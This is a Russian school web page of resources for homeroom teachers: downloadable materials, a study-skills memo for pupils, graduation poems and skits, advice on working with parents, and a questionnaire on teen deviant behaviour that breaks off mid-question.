Яндекс.Метрика

Поделись ссылкой на страницу с друзьями



Готовимся к первому уроку 2022/2023 учебного года

Классные руководители 1-11 классов с целью формирования позитивного общественного мнения о лицах с особенностями психофизического развития могут организовать работу с родителями и учащимися на основе телевизионных фильмов "Каждый имеет право быть равным".Телевизионный цикл из 21 фильма размещен на сайте Представительства Детского фонда ООН (ЮНИСЕФ) в Республике Беларусь

Download
Что означают наши имена
Классный час (детям будет интересно)
Классный час по теме Что означают наши и
Microsoft Word Document 67.0 KB
Download
Таблицы по здоровому образу жизни
(картинки)
Таблицы по здоровому образу жизни.doc
Microsoft Word Document 3.1 MB

Материалы для оформления стендов в классах

Download
Кодекс поведения в конфликте
На стенд Кодекс поведения в конфликте.do
Microsoft Word Document 21.0 KB
Download
Памятки по ТБ
На стенд Памятки по ТБ.doc
Microsoft Word Document 25.0 KB
Download
Учись сидеть правильно
На стенд Учись сидеть правильно.doc
Microsoft Word Document 125.0 KB
Download
О режиме дня
О режиме дня.doc
Microsoft Word Document 32.5 KB

Download
Отчет о поведении ученика
Отчёт о поведении ученика.doc
Microsoft Word Document 40.5 KB

Как готовить домашние задания

Памятка для учащихся

1. Активно работай на уроке: внимательно слушай, отвечай на вопросы.

2.   Задавай вопросы, если чего-то не понял или с чем-то не согласен.

3.   Точно и как можно подробнее записывай, что задано по каждому предмету.

4.   Научись пользоваться словарями и справочниками. Вы­ясняй значение незнакомых слов, находи нужные факты и объяснения, правила, формулы в справочниках.

5.   Если у тебя есть компьютер, научись с его помощью на­ходить нужную информацию, производить нужные расчеты с помощью электронных таблиц и т.п.

6.   Если то, что проходили на уроке, показалось тебе труд­ным, повтори материал в тот же день, даже если следующий урок будет через несколько дней.

7.   Приступая к выполнению каждого задания, думай не только о том, что надо сделать (то есть о содержании задания), но и о том, как (с помощью каких приемов, средств) это мож­но сделать.

8.   В случае необходимости обращайся за помощью ко взрослым или к одноклассникам.

9.  Приступая к выполнению уроков, раскрой дневник, посмотри, все ли задания записаны.

10. Продумай последовательность выполнения заданий по отдельным предметам и прикинь, сколько времени тебе понадобится для выполнения каждого задания. Убери со стола все лишнее—то, что может отвлекать. При­готовь то, что нужно для выполнения первого задания (учеб­ник, тетради, карты, карандаши, словари, справочники и т.п.). 

11. После того как подготовишься к первому уроку, все убери и при­готовь то, что нужно для выполнения следующего, и т.п.

12. Между уроками делай перерывы.

13. Сначала постарайся понять материал, а затем его запом­нить.

14. Прежде чем выполнять письменные задания, пойми и выучи правила, на которые оно направлено.

15. При чтении параграфа учебника задавай себе вопросы: о чем или о ком говорится в этом тексте, что об этом говорится.

16. Ищи связь каждого нового понятия, явления, о котором ты узнаешь, с тем, что ты уже знаешь. Соотноси новое с уже известным. Следи за тем, чтобы это были не случайные, вне­шние связи, а главные связи, связи по смыслу.

17. Если материал, который надо выучить, очень большой или трудный, разбей его на отдельные части и прорабатывай каждую часть в отдельности. Используй метод ключевых слов.

18. Не оставляй подготовку к докладам, сочинениям, твор­ческим работам на последний день, поскольку это требует большого количества времени. Готовься к ним заранее, на про­тяжении нескольких дней, распределяя нагрузку равномерно.

19. При подготовке устных уроков используй карты, схемы. Они помогут тебе лучше понять и запомнить материал. К ним необходимо обращаться и при ответах на уроке. Чем лучше ты
умеешь пользоваться картами, схемами, таблицами, тем выше будет оценка.

20. Попробуй использовать при подготовке устных заданий метод «5П», разработанный американскими психологами.1 По данным психологов США, такой метод позволяет сосредото­чить внимание на самом важном в тексте и способствует луч­шему его запоминанию.

21. Составляй план устного ответа.

22. Проверяй себя.

  У тебя все получится!

 

Помни: мы лучше всего запоминаем:

—то, чем постоянно пользуемся;

—то, к чему нам надо будет вернуться (прерванные дей­ствия);

—то, что нам нужно;

—то, что мы можем связать с другими нашими знаниями и умениями;

—то, что связано с нашими переживаниями (и приятны­ми, и неприятными).

 

Метод ключевых слов

Ключевые слова — самые важные в каждом абзаце.

Ключевое слово должно способствовать воспроизведение соответствующего абзаца. Вспоминая ключевые слова, мы сра­зу вспоминаем весь абзац.

Читая абзац, выбери для него одно-два ключевых слова.

После выбора ключевых слов запиши их в той последова­тельности, которая нужна для выполнения задания.

К каждому ключевому слову поставь вопрос, который по­зволит понять, как оно связано с соответствующим разделом текста. Обдумай и постарайся понять эту взаимосвязь.

Соедини два соседних ключевых слова с помощью вопросов.

После соединения каждого ключевого слова со своим раз­делом текста и с последующим ключевым словом образуется цепочка.

Запиши эту цепочку и постарайся ее выучить.

Перескажи текст, опираясь на эту цепочку.

 

Метод «5 П»

1П — Просмотри текст (бегло)

2П — Придумай к нему вопросы

3П — Пометь карандашом самые важные места

4П — Перескажи текст

5 П — Просмотри текст повторно

Пожелания детям от классных руководителей

 

Дорогие мои взрослые дети!

Сегодня мы вас проважаем

В большую жизнь. А что вней ждет?

На светлый путь благославляем.

И пусть удача к вам придет.

Надеяться на вас мы смеем,

В душе лелея мысль такую,

Что с вами мир станет добрее,

И здравый смысл восторжествует.

Хочу, чтоб вам дерзать хотелось,

Чтоб вы творили и мечтали

И чтоб азарт, упорство, смелость

В делах всегда сопровождали.

Мой уходящий выпускной класс -

Строгий критик и ценитель,

Задорный, юный, озорной,

В тебя я верю как учитель.

От всей души, со всей любовью,

Вас поздравляю нынче я,

Желаю счастья всем, здоровья.

И в добрый путь, мои друзья!

 

 

 

 

Пожелания детям от родителей

 

Мама. Мы - счастливые родители, дорогие наши дети, и сегодня мы хоти поблагодарить тех, кто чуточку приблизил вас к мечте, кто отдал вам не только свои знания, но и свое сердце. Огромное родительское спасибо Вам, дорогие учителя ( вручает хлеб учителям и директору)

Папа Перед тобой сейчас, поверь,

В большую жизнь открыта дверь.

За ней - нелегкие пути,

И вам по ним вперед идти.

Из множества земных дорог

Одну ты выбрать поспеши.

Пусть этот выбор будет строг,

А мы желаем от души

Все в жизни лучшее познать.

Уметь любить, страдать, мечтать,

Людей в беде не покидать

И злом на зло не отвечать.

Мама С добром в душе старайтесь жить,

Обиду долго не хранить, 

Не предавать друзей своих,

Ведь трудно в в жизни нам без них.

Любовь пусть в сердце не остынет,

Пускай удача не покинет,

И чуждою жестокость станет.

А птица счастья не обманет.

Еще хотим мы пожелать

Смелее по земле шагать,

Учителей не забывать

И добрым словом вспоминать.


Пожелания классным руководителям от родителей

Уважаемые классные руководители!

Ваш труд почетен, благороден,

Он знаний требует больших!

Вы дали нашим детям в Жизнь дорогу,

Мы знаем, Вы любили их!

 

Сегодня от души хотим мы вас поздравить,

Вы классные! Творите только добрые дела!

Вы искренни, ответственны, надежны

За это честь Вам и огромная хвала!

 

Поверьте, мы Вас очень уважаем,

За строгость, и за дельные советы!

Умы Вы наши наполняли знаньями:

Оценки, шалости –

На все были ответы.

 

Учили думать нас открыто, смело.

Дарили мудрость детям, а родителям терпенье

Спасибо классные за это.

Поклон Вам за старанье и уменье

 

Мы все родители желаем вам здоровья,

Невзгоды мимо Вас пускай пройдут!

Улыбкой мир для Вас пусть будет полон,

Оплачен хорошо Ваш благородный труд!

 

 Успехов Вам и творчества желаем!

Учеников пытливых и послушных,

Поменьше недовольных, равнодушных!

Любви, цветов и красоты,

Пусть высоко оценят все Ваши труды!

Выступление учителей

«Мы вам вот что сказать хотим...».

 

Целый год под этой крышей
Жил одиннадцатый класс.
С каждым днем все выше, выше
Становился он у нас.
На глазах они умнели
И взрослели с каждым днем,
А теперь мы нашим деткам
Аттестаты выдаем!
Как не вспомнить нам девчонок –
В голове – одни мечты!

Как бы строем их отправить
Всех на конкурс красоты!
И какая тут учеба?
Все сияет и блестит:
Губки, щечки, глазки в краске.
Глянешь – сердце защимит.
Как не вспомнить нам мальчишек,
С кем ты столько воевал!
В доску глядя, что есть мочи,
Кто из трубочек стрелял?
И хотели б мы, ребята,
Пожелать вам в этот час
Приходить сюда почаще,
Вспоминать почаще нас!
Здесь вас помнят,
Здесь вас любят.
Каждый класс, как дом родной...

Ну, а мы, все педагоги,
Как всегда, за вас горой!

Выступление классных руководителей.

 

Не торопитесь уходить!
Постойте у открытой двери.
Нельзя же с легкостью забыть
Тех, кто вас любит, кто вам верит.
Не торопитесь отвергать,
Когда вам душу открывают.
Достаньте мудрости печать,
Сумейте просто промолчать,
Вы ведь умеете, я знаю!
Не торопитесь разлюбить,
Все чувства сразу отвергая,
Тепла вам может не хватить,
Чтоб отчужденья лед растаял.
Не торопитесь успевать.
Найдите миг остановиться,
А вдруг получится узнать
И там, где ждали, появиться.
Не торопитесь все забыть,
От вздорной мысли отмахнуться.
Как нелегко все возвратить,
Как нелегко назад вернуться...
Не торопитесь уходить...


Классные руководители

 

Дай вам Боже чуть побольше счастья и любви.  
И друзей хороших тоже, чтоб не подвели!
Чтоб дорога вашей жизни
Привела бы вас к мечте.
Добивайтесь, не сдавайтесь никогда, нигде!
Дай вам Боже быть мудрее и сильнее быть.
Дай к друг другу быть добрее, научи любить.
Светлый путь пусть освещает путеводная звезда!
Чтоб не знали вы несчастий!
Будьте счастливы всегда!
В семьях чтобы вечно были счастье и успех!
И почаще вспоминайте школу и нас всех.
Красота, добро, надежда, радость, вера и любовь
Вашу жизнь пусть украшают, –
Мы желаем вновь и вновь.

Классные  руководители. 

 

Вам открыты все пути-дороги,
Надо смело выбрать и решить,
Только тайну отчего порога
Не спешите вы переступить.
Звезды доставать учитесь сами,
Неба не пугайтесь синевы!
Будьте, парни, гордыми орлами!
Чайками, девчонки, будьте вы!
Гнезд своих родных не забывайте,
Как бы ни были дни в жизни веселы,
Прилетайте в гости, прилетайте,
Прилетайте, чайки и орлы!
Но сколь чего ни длилось бы,
А все конец случается.
И верим, что экзамены
Сдадут наверняка. Теперь пора их школьная,
И детская, и вольная,
Проходит и кончается,
Настал черед последнего,
А может, не последнего,
А только предпоследнего
Последнего звонка!


К Последнему звонку

Сценка "Божественная комедия".

Табличка на ширме "Небесная канцелярия".

За ширмой  сидят классные руководители, ангел и черт.

Перед ширмой сидит Бог. 

Бог 

(читает). "Заявка. Администрация школы № _ убедительно просит Вас прислать классного руководителя на 5-9 класс.

Чтоб женщиной была, наукой чтоб владела,

Чтобы классною была и за детьми смотрела.

(звонит) Але, справочная? Что такое классный?

Справочная. 

Это мама с добрыми лучистыми глазами.

Это тот, кто в школьной жизни самый главный.

Это сердце, отданное детям без остатка.

Рядом с ним все будни - это просто сказка.

Бог. 

Что ж придется подсобить:

маму классную слепить!

Эй ты ангел, эй ты черт!

(из-за ширмы появляются ангел и черт)

Вас уж ждет работа.

Командовать тут буду я -

Мне чудо сотворить охота!

Материал исходный вот ( протягивает тесто)

Лепите, поспешайте!

пусть все в нее от нас войдет.

Приступим, помогайте!

( под музыку лепят)

Ангел. 

Готовы руки, голова ( из-за ширмы появляются руки и головы классных руководителей)

Черт. 

И ноги на подходе ( под ширмой появляются ноги)

Бог. 

Пусть будет школа ей семьей,

Успехов ей в работе.

Ангел.

Пусть деткам песенки поет,

На инструментах пусть играет.

Черт. 

И про вампиров перед сном

С охотою читает.

Бог. 

Гибкий стан ей создадим.

А дальше - пусть следит за ним.

Ангел.

Пусть спортом увлекается.

Черт. 

И в мужиков влюбляется.

Ангел. 

Пусть будет обаятельной.

Бог. 

А также привлекательной.

Черт. 

Немного чертовщинки

Добавим обязательно.

Ангел. 

Немного меланхолии,

Побольше оптимизма.

Черт. 

И подбросим  в это

Граммульку эгоизма.

Ангел. 

Ну, слава Богу, молодцы -

быстро все слепили,

Бог. 

Да только вот талант большой

Дать ей позабыли.

Ангел. 

Ну как детьми-то управлять?

Придется пряник свой отдать.

Черт. 

А я добавлю к нему кнут.

Бог. 

А я ей дам такое сердце ,

Чтоб поделиться им могла,

Чтоб его на всех хватило.

Пусть вселится в него душа.

Ну что же, чудеса свершились.

Классные мамы у нас получились.

 

 

Давно мы сроднились, вы стали нам мамой второю,

И нам было грустно расстаться хотя бы на день.

Но время идет, и бежит очень быстро порою,

Сегодня меж нами встает расставания тень.

 

И все у нас было: взаимные ссоры, обиды,

Заносчивость, лень и безграмотность, жуткий ответ,

Но надо прощать, и в этом мы мнении едины,

И мы понимаем: труднее профессии нет.

 

И каждый учитель, конечно, нам стал уже дорог,

И каждый частицу себя оставляет в сердце у нас,

Но классным своим говорим мы "спасибо" особо,

И всех педагогов мы помним, и вы вспоминайте о нас.

Спецэффектная жизнь жизнь, технологий обвал,

Теле-, видеобум, информационная масса,

Перфокарты, компьютер, дисплей, терминал,

И при этом при всем ты один перед классом.

И не будет работать ничто без тебя,

И никто не подскажет, никто не обучит,

И навряд ли компьютер полюбит ребят...

Человек образованный все-таки лучше. 


СКАЗКА О ЗОЛОТОЙ РЫБКЕ

(Сказка классных руководителей)

1 Садитесь, друзья, поудобней,

Мы вам расскажем сказку –

Старую, мудрую сказку

О Золотой рыбке.

2 У самого синего моря

Жили две классных мамы

И два еще классных папы.

3 Дети у них были разные –

А вот заботы общие.

И от забот этих тяжких

У них голова болела

И днем, и позднею ночью.

4 Пошли они к синему морю,

Чтобы забросить невод

В надежде на то, что поймают

Они Золотую рыбку.

5 Идут они к синему морю,

И каждый думает думу:

О чем он попросит Рыбку,

Какое желанье исполнить?

6 Я сказала бы:

Рыбка!

Государыня Золотая!

Сделай так, чтобы дети

Свои подтвердили медали!

7 А я бы взмолился:

Рыбка!

Медалистов нет – и не надо!

Сделай такое чудо,

Чтобы ЕГЭ все сдали!

8 А я бы пришел с поклоном:

Государыня Рыбка!

Пусть наши дети поступят

В вузы – и лучше бесплатно!

9 А я попросила бы Рыбку:

Смилуйся, государыня!

Может, хочу слишком много, –

Чтобы когда-нибудь в школу

Пришли они с добрым словом!

10 И вот они в синее море

Раз закинули невод –

Пришел он с одною тиной.

11 В другой раз закинули невод –

Пришел он с травою морскою.

12 В третий раз, наконец-то,

Попалась Рыбка Золотая

И голосом молвит человечьим:

13 «Чего вам надобно, люди?»

14 Бухнулись перед нею

Классные мамы на колени,

15 Взмолились классные папы:

«Государыня Рыбка!

Не надо нам ни нового корыта,

Ни дворцов, ни дворянства,

Ты помоги нам исполнить

Наши заветные желания!»

16 Послушала всех их Рыбка

И отвечала тихо:

«Сколько вы лет их учили?

Сколько вы сил в них вложили?

Разве не вашей рукою

Каждый дневник исписан?

Разве не вашей ногою

К классу маршрут проложен?

Разве уста не ваши

На классных часах вещали?

Разве звонки не ваши

Родителей доставали?

Остался всего лишь месяц!

Что ж вам никак неймется?!

17 И без меня они смогут

Экзамены сдать успешно.

И без меня получат

Медали свои золотые.

И без меня поступят –

Не зря же вы их учили.

18 А вот придут ли в школу

Когда-нибудь с добрым словом,

Сейчас вам никто не скажет,

Это время покажет.

19 Теперь же ступайте с богом,

Терпения наберитесь

И в сердце своем храните

Веру, Любовь и Надежду!»

«Молитва»

(Исполняют классные руководители и ансамбль)

Грустной музыкой звонка

День над нами проплывает,

Он не закончился пока –

Но скоро он растает

Грустной музыкой звонка…

В свой сердечный круг друзей

Тех, кто дорог, принимаю.

В водовороте школьных дней

Все больше понимаю,

Как мне нужен круг друзей.

Припев:

О боже, дай мне сил,

Что задумано, успеть,

Ни о чем не сожалеть.

О, боже, дай мне сил

И терпенья одолжи

Против зависти и лжи,

Зависти и лжи.

Время, словно карусель,

Закружить легко нас может,

И блеском призрачных огней

Покой и сон тревожит

Время, словно карусель.

Сколько в сердце свежих ран

От потерь и сожалений!

Но никому я не отдам

Надежду – путь к спасенью, –

Никому я не отдам!

Припев.

Дорогой выпускник!

Будь беспокойным! Не считай отрадой

Благополучья собственного рай!

Дерзай! Работай! Ошибайся! Падай!

И снова все сначала начинай!

Не так легко, не так все это просто.

Но пусть в тебе горит огонь живой

Огромного, святого недовольства

Самим собой!

Слова учителя

 Как грустно в зале в этот день весенний,

Своих питомцев видеть нам опять.

Для них настал, действительно, последний

Их школьный день, не повернуть все вспять.

 

Вас от души мы поздравляем,

Промчалась школьная пора.

Так в добрый путь, и пожелаем

Ни пуха в жизни вам и ни пера.

Но что грустить о прожитом напрасно?

Ведь налицо пред нами результат.

И юношам, и девушкам прекрасной

Необходимо жизни пожелать.

 

И пусть все будет так, как вам хотелось,

Экзамены успешно в школе сдать,

Чтоб в жизни так работалось, как пелось,

А главное, себя не потерять.

 

Итог работы нашей стал виднее,

И вот момент прощания настал,

И нет сейчас мгновения важнее,

Чтобы звонок последний прозвучал.

 

Пожелание

Пожелаем Вас всем широкой дороги, 

Поменьше ненастья,

Чтоб у каждого было настоящее счастье.

А над городом вновь опускается вечер,

Отзвенела гитара, и балу - отбой!

Хоть немного тепла этой памятной встречи 

Унесите с собой, унесите с собой!!!

И не будем давать обещаний трескучих,

Громких слов говорить, клятв высоких давать.

Просто жить на земле постараемся лучше,

Чтобы школьный престиж никогда не терять. 


Download
День коллективного отдыха родителей и детей
День коллективного отдыха.doc
Microsoft Word Document 35.0 KB
Download
Как научиться сдавать экзамены
материалы к классному часу
Материалы к классному часуКак научиться
Microsoft Word Document 64.5 KB
Download
Памятка для учащихся при подготовке к экзаменам
Буклет
Экзамены.rar
compressed file archive 270.8 KB
Download
Во всеоружии (о подготовке к экзаменам и в шутку, и в серьез)
Информационный материал
экзамены.docx
Microsoft Word Document 23.0 KB
Download
День науки
Первооткрыватели
Клруководство День науки.doc
Microsoft Word Document 130.5 KB
Download
Ученик года
конкурс
Классное руководство Ученик года.doc
Microsoft Word Document 37.0 KB

Материалы по методике классного руководства

Download
ФУНКЦИИ КЛАССНОГО ЧАСА.doc
Microsoft Word Document 33.5 KB
Download
НОВЫЕ ФОРМЫ ВОСПИТАТЕЛЬНОЙ РАБОТЫ
Новые формы воспитания.doc
Microsoft Word Document 147.0 KB
Download
СОДЕРЖАНИЕ РАБОТЫ КЛАССНОГО РУКОВОДИТЕЛЯ КАК СОЦИАЛЬНОГО ПЕДАГОГА
СОДЕРЖАНИЕ РАБОТЫ КЛАССНОГО РУКОВОДИТЕЛЯ
Microsoft Word Document 64.0 KB
Download
Темы по самообразованию классных руководителей.
Темы по самообразованию.doc
Microsoft Word Document 36.5 KB
Download
НАСТОЛЬНАЯ КНИГА КЛАССНОГО РУКОВОДИТЕЛЯ
НАСТОЛЬНАЯ КНИГА КЛАССНОГО РУКОВОДИТЕЛЯ.
Microsoft Word Document 731.0 KB
Download
Дневник классного руководителя
ДНЕВНИК.rar
compressed file archive 71.0 KB
Download
Акт обследования условий жизни и воспитания несовершеннолетнего
Акт обследования класс.doc
Microsoft Word Document 39.0 KB
Download
Читающая семья
читающая семья.docx
Microsoft Word Document 31.2 KB

Школа классного руководителя

Download
МЕТОДЫ ИЗУЧЕНИЯ СЕМЬИ УЧЕНИКА
методы изучения семьи.docx
Microsoft Word Document 16.1 KB
Download
ОБУЧЕНИЕ РОДИТЕЛЕЙ
обучение родителей.docx
Microsoft Word Document 28.1 KB
Download
ОСНОВНЫЕ НАПРАВЛЕНИЯ ДЕЯТЕЛЬНОСТИ КЛАССНОГО РУКОВОДИТЕЛЯ В РАБОТЕ С УЧАЩИМИСЯ И ИХ РОДИТЕЛЯМИ
ОСНОВНЫЕ НАПРАВЛЕНИЯ ДЕЯТЕЛЬНОСТИ.docx
Microsoft Word Document 15.0 KB
Download
ОСНОВНЫЕ НАПРАВЛЕНИЯ СОВМЕСТНОЙ ДЕЯТЕЛЬНОСТИ ПЕДАГОГОВ И РОДИТЕЛЕЙ
ОСНОВНЫЕ НАПРАВЛЕНИЯ СОВМЕСТНОЙ.docx
Microsoft Word Document 12.3 KB
Download
ОСНОВНЫЕ ЭТАПЫ РАБОТЫ ШКОЛЫ С РОДИТЕЛЯМИ
ОСНОВНЫЕ ЭТАПЫ РАБОТЫ ШКОЛЫ.docx
Microsoft Word Document 11.3 KB
Download
РОЛЬ РОДИТЕЛЕЙ В ОРГАНИЗАЦИИ ДОСУГА ПОДРОСТКА
роль родителей.docx
Microsoft Word Document 26.1 KB
Download
СОДЕРЖАНИЕ, ФОРМЫ И МЕТОДЫ РАБОТЫ С РОДИТЕЛЯМИ
СОДЕРЖАНИЕ, ФОРМЫ И МЕТОДЫ РАБОТЫ С РОДИ
Microsoft Word Document 20.3 KB
Download
ПРИМЕРНАЯ ТЕМАТИКА БЕСЕД И ЛЕКЦИЙ ДЛЯ РОДИТЕЛЕЙ
тематика бесед.docx
Microsoft Word Document 13.3 KB
Download
ФОРМЫ ВЗАИМОДЕЙСТВИЯ УЧИТЕЛЯ С РОДИТЕЛЯМИ УЧАЩИХСЯ
формы взаимодействия.docx
Microsoft Word Document 14.0 KB

ПАМЯТКИ КЛАССНЫМ РУКОВОДИТЕЛЯМ

Щенок, воспитанный пинком,

Не будет преданным щенком.

Ты после грубого пинка

Попробуй, подзови щенка.

Где раздают щенкам пинки,

Там воспитатели – пеньки.

С. Михалков

 

·        Думайте о своих отношениях с детьми, выстраивайте их.

·        Помните, что психологическая атмосфера в детском коллективе, прежде всего, зависит от отношения к человеку, как высшей ценности.

·        Умейте слушать детей.

·        Не забывайте, что у детей могут быть конфликты, и что вы можете спровоцировать их своей педагогической несостоятельностью.

·        Обращайте внимание в общении на особенности девочек. Они более эмоциональны, ранимы.

·        Преодолевайте отрицательное отношение к некоторым ребятам.

·        При общении с детьми педагог не должен забывать об эмпатии (сочувствие,  сопереживание  ребенку)   и   педагогической   рефлексии (объективной оценки себя, самоконтроль).

·        При работе с «трудными» подростками следует так организовывать деятельность, при которой «трудному» ребенку был бы гарантирован успех, как следствие, уважение сверстников, то есть обеспечить «ситуацию успеха».

·        Помните, что преподаватель должен быть творческой личностью, «исследователем», а не простым «урокодателем», обезличенным носителем информации».

·        Чаще улыбайтесь детям. Школа, лишенная оптимизма, деградирует и умирает, преподаватель, не видящий перспективы своих отношений с детьми, не верящий в их способности, не может научить их даже таблице умножения.

Помните, что основой нравственности на Руси всегда была вера в Бога и труд.

РЕКОМЕНДАЦИИ К ПРОВЕДЕНИЮ КОНСУЛЬТАЦИЙ

(с родителями)

 

  1. Консультация проводится по запросам родителей, ребенка и классного руководителя.
  2. Проблема, которая будет обсуждаться, классному руководителю хорошо известна и рассматривалась им самим с различных позиций: ребенка, родителей, педагогов.
  3. В ходе консультации необходимо дать возможность заинтересованным сторонам высказать свое мнение и свое отношение к проблеме.
  4. Участники консультации, которые пытаются помочь родителям, должны быть компетентны в решаемой проблеме.
  5. Консультация должна проходить в доброжелательной атмосфере, без назидания и угроз.
  6. В ходе консультации необходимо обратить внимание на все то хорошее и положительное, что есть в ребенке и только потом говорить о проблемах.
  7. В ходе консультации неуместно сравнивать детей друг с другом, можно лишь говорить о прежних качествах, успехах и недостатках в сравнении с сегодняшним днем.
  8. Консультация должна дать родителям реальные рекомендации по проблеме специалистов, педагогов, классного руководителя.
  9. Консультация должна быть перспективной и способствовать реальным изменениям в семье и в лучшую сторону.

Результаты консультации не должны стать темой обсуждения посторонних людей.

 

 

Кодекс классного руководителя

 

Классный руководитель – это не работа, это образ жизни.

Советы, рекомендации, предостережения классному руководителю:

1. Во взаимодействии и взаимоотношениях с воспитанниками должно быть меньше формализма, больше человеческого общения.

2. Главное – не воспитывать ребят, а жить с ними совместной деятельностью тот отрезок времени, который вам выпало быть вместе. При этом к воспитанникам относись так, как хочешь, чтобы они относились к тебе.

3. Учащиеся, не нашедшие подтверждения своих способностей к обучению хотя бы по одному предмету, теряют интерес к школе вообще.

4. Лучше больше хвалить и меньше ругать; исповедуй педагогику успеха – она приносит хорошие результаты.

5. Силы и время, потраченные на организацию насыщенной классной жизни, на культурное развитие учеников, никогда не будут потрачены напрасно.

6. Главное – найти какое-либо интересное дело, в которое ты можешь вовлечь детей, стать им интересным, тогда они будут к тебе прислушиваться, им будет интересно с тобой, а тебе интересно с ними.

7. Родитель ребенка – не твой ученик, не твой враг, а друг, советчик, единомышленник.

8. Лучшая форма взаимоотношений с родителями: дети – родители – учитель – семья.

9. Главное – не жди прямых актов благодарности, тогда не будет разочарований.

10. Дети в классе – твое отражение; старайся постоянно работать над собой.

11. Главное – сохраняй молодость души на долгие годы, тогда тебе легче будет понять юных, рядом с которыми должна состояться твоя счастливая профессиональная карьера.

 

 

 

АНКЕТА ДЛЯ классных РУКОВОДИТЕЛЕЙ

1. Привлекает ли Вас работа классного руководителя или Вы отказались бы от неё, если была бы такая возможность?

2. В чем, по Вашему мнению, заключается сложность работы классного руководителя?

3. Какую конкретную помощь в организации своей работы с классом Вы хотели бы получить:

– в планировании;

– в выборе форм и методов;

– в изучении ученического коллектива;

– в работе с родителями, учителями, общественными организациями;

– в другом (укажите, в чем именно)_____________________.

4. Если бы Вы были членом администрации учебного заведения, какие бы изменения в организацию воспитательной работы внесли?

5. С какими трудностями Вы сталкиваетесь, работая с классом? В чем видите их причину?

6. Что Вам лучше всего удается в Вашей работе с классом?

7. Какие качества поведения, черты характера Ваших ребят больше всего Вас огорчают?

8. Какие качества поведения, черты характера Ваших ребят больше всего Вас радуют?

9. Каким опытом Вы могли бы поделиться с коллегами?

10. Ваши пожелания и предложения.

 

 

 

Download
Анкетный опрос родителей на первом родительском собрании в учебном году
Анкетный опрос родителей.doc
Microsoft Word Document 22.5 KB
Download
Заповеди классного руководителя
Заповеди классного руководителя.doc
Microsoft Word Document 23.5 KB
Download
Школьный документ - справка.
Как составить справку.doc
Microsoft Word Document 26.0 KB
Download
Методика проведения активных форм воспитания и видов коллективной творческой деятельности.
Методика проведения актив. форм восп..do
Microsoft Word Document 32.0 KB
Download
Педагогический совет на тему: "Роль классного руководителя в становлении классного коллектива и его влияние на формирование личности каждого ученика"
Педагогический совет на тему Роль классн
Microsoft Word Document 54.5 KB
Download
Тематика и содержание бесед для учащихся среднего и старшего звена
Беседа Тематика и содержание бесед для у
Microsoft Word Document 353.5 KB
Download
Деловая методическая игра "Методическое путешествие"
Деловая методическая игра для кл. руково
Microsoft Word Document 41.0 KB
Download
Воспитательная работв в школе. Направления работы
Воспитательная работа в школе НАПРАВЛЕНИ
Microsoft Word Document 23.0 KB
Download
Информационный час
Методика проведения Информационного часа
Microsoft Word Document 27.0 KB
Download
РЕКОМЕНДАЦИИ КЛАССНОМУ РУКОВОДИТЕЛЮ СРЕДНИХ КЛАССОВ ПО ПРОФЕССИОНАЛЬНОЙ ОРИЕНТАЦИИ.
РЕКОМЕНДАЦИИ КЛАССНОМУ РУКОВОДИТЕЛЮ по П
Microsoft Word Document 31.5 KB
Download
В копилку молодого учителя. Пути эффективного взаимодействия классного руководителя с родителями
В копилку молодого учителя. Пути эффекти
Microsoft Word Document 189.0 KB
Download
ПРАВИЛА СОТРУДНИЧЕСТВА КЛАССНОГО РУКОВОДИТЕЛЯ С УЧАЩИМИСЯ
Клруководство ПРАВИЛА СОТРУДНИЧЕСТВА КЛА
Microsoft Word Document 29.5 KB
Download
Методическое объединение классных руководителей
МО классныхруководителей.doc
Microsoft Word Document 26.5 KB
Download
Повышение статуса классного руководителя и успешное взаимодействие с родителями
Урок Повышение статуса классного руковод
Microsoft Word Document 32.0 KB


Портфолио классного руководителя

 

Download
Портфолио классного руководителя
Извлечение из конвенции о правах ребенка
Портфолио классного руководителя.doc
Microsoft Word Document 6.8 MB

Красивые мелодии, которые пригодятся при проведении мероприятий, составления презентаций

Download
Шопен Вальс №10
31-Chopin. Valse No10.mp3
MP3 Audio File 6.8 MB
Download
Шопен Мазурка
32-Chopin. Mazurka in C-sharp minor.mp3
MP3 Audio File 3.2 MB
Download
Шопен Вальс № 14
33-Chopin. Valse No14.mp3
MP3 Audio File 4.4 MB
Download
Шуберт Аве Мария
35-Schubert. Ave Maria.mp3
MP3 Audio File 7.9 MB
Download
Чайковский увертюра к опере Щелкунчик
61-Tchaikovsky. Overture to Nutcracker.m
MP3 Audio File 5.9 MB
Download
Чайковский Сентиментальный вальс
60-Tchaikovsky. Valse Sentimentale.mp3
MP3 Audio File 3.8 MB
Download
04. ДиДюЛя - Полет на воздушном шаре.mp3
MP3 Audio File 4.3 MB
Download
Лядов Музыкальная табакерка
76-Liadov. Musical Snuff-Box.mp3
MP3 Audio File 4.3 MB
Download
krasivaya_fonovaya_muzyika_1.mp3
MP3 Audio File 3.4 MB
Download
Выход Ведущего - Хорошо.mp3
MP3 Audio File 3.0 MB
Download
Чува-у-ва.wma
Windows Media Music File 2.6 MB
Download
свеж.mp3
MP3 Audio File 489.1 KB
Download
На стихи.mp3
MP3 Audio File 2.7 MB
Download
Twilight-3.mp3
MP3 Audio File 5.7 MB
Download
Radio_Killer_-_Be_free_(Radio_Edit)_muzn
MP3 Audio File 3.0 MB

Если в вашем классе есть подростки с девиантным поведением

ДЕВИАНТНОЕ ПОВЕДЕНИЕ ПОДРОСТКА: МНЕНИЯ,

ОЦЕНКА, ОПАСЕНИЯ

 

Анкета для родителей

Анкета  позволяет  узнать,  насколько  серьезно  родители  школьников  относятся  к  возможным проблемам в поведении своих детей, а также то, как они оценивают вероятность их возникновения.

 

Уважаемые родители!

Заранее благодарим вас за внимание и участие.

1.    Какие формы поведения вы назвали бы отклоняющимися от нормы? 

1)    нарушение  правил  поведения  в  школе  (срывы  уроков,  прогулы,  отказ  от  выполнения заданий); 

2)    побеги из дома;

3)    грубость, сквернословие;

4)    употребление алкоголя, пьянство; 

5)    курение;

6)    раннее начало половой жизни;

7)    хулиганство;

8)    унижение других;

9)    воровство;

10)  неподчинение, критика взрослых;

11)  ношение «вызывающей» одежды;

12)  отрицательное отношение к учебе;

13)  драки, нанесение телесных повреждений;

14)  употребление наркотиков;

15)  что-то еще.

2.    Какие из них вы считаете наиболее распространенными среди сверстников ваших детей или вашего ребенка (перечислите, пожалуйста, соответствующие номера ответов из первого вопроса)?

3.    Сколько, примерно, времени в день ваш ребенок (или ваши дети) предоставлен самому себе? 

1)     не более 1 часа; 

2)    2–3 часа;

3)     4–5 часов;

4)     6–8 часов;

5)     более 8 часов;

6)     затрудняюсь ответить.

4.    Что обычно делает ваш ребенок в свободное от учебы время?

